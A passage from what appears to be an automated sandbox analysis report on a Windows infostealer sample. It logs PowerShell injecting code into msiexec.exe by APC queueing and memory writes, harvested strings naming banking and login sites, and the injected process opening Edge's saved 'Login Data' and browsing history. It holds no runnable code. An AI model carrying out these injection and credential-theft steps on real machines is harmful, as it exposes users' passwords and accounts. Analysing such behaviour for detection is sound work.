            Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeAPI call chain: ExitProcess graph end nodegraph_0-2805
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeAPI call chain: ExitProcess graph end nodegraph_0-2984
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000BD044 LdrInitializeThunk,LdrInitializeThunk,5_2_000BD044
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3C20000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406072

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
